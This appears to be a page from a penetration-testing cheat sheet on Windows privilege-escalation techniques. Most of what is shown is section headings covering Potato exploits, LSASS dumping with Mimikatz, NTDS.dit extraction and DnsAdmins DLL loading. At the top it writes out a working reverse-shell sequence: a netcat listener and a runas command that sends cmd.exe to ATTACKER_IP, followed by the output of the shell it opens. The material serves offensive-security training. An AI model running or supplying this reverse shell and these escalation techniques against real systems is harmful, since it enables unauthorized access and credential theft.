Windows Privilege Abuse
Recovered Local Admin Credentials
nc -nlvp 9001runas /user:Administrator "nc.exe -e cmd.exe ATTACKER_IP 9001"Enter the password for Administrator:
Attempting to start nc.exe -e cmd.exe ATTACKER_IP 9001 as user "HOSTNAME\Administrator" ...connect to [ATTACKER_IP] from (UNKNOWN) [TARGET]
Microsoft Windows [Version 10.0.19044.1645]
C:\WINDOWS\system32>SeImpersonate / SeAssignPrimaryToken
Overview
Check for the Privilege
JuicyPotato (< Windows Server 2019 / Win10 1809)
PrintSpoofer (Windows Server 2019+ / Win10 1809+)
XAMPP Apache webshell to SYSTEM
GodPotato
GodPotato service payload
PrintNotifyPotato
SigmaPotato
RoguePotato
Common Scenario: MSSQL xp_cmdshell
SeDebugPrivilege
Overview
Dump LSASS with ProcDump
Extract Hashes with Mimikatz
Alternative: Task Manager LSASS Dump
RCE as SYSTEM via Parent Process
SeTakeOwnershipPrivilege
Overview
Enable the Privilege
Take Ownership and Read File
Interesting Files to Target
SeBackupPrivilege (Backup Operators Group)
Overview
Enable and Use
Copy NTDS.dit from Domain Controller
Extract Hashes
Domain Admin diskshadow
Robocopy Alternative
Event Log Readers Group
DnsAdmins Group
Attack: Load Malicious DLL via DNS Service
Cleanup
WPAD Record Attack (Alternative)
Print Operators Group (SeLoadDriverPrivilege)
Server Operators Group
Hyper-V Administrators
Last updated